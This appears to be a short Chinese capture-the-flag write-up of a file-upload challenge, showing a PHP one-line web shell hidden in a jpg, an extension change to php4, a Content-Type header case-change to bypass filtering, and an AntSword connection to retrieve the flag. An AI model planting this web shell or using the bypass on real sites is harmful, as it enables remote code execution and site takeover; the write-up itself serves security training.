目录
题目:
启动环境
让我们上传张图片
在jpg文件里写入一句话木马
<?php @eval($_POST['1']);?>
burpsuite抓包
将后缀改为php4
没有上传成功 请求头被过滤了
这里将请求头Content-type随便一个字母改为大写 实现绕过
(请求数据Content-type得是image/jpeg)
再放包 上传成功 在upload下面
蚁剑连接
拿到flag
恭喜你拿到flag 实现晋升 点个关注收藏再走吧~
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
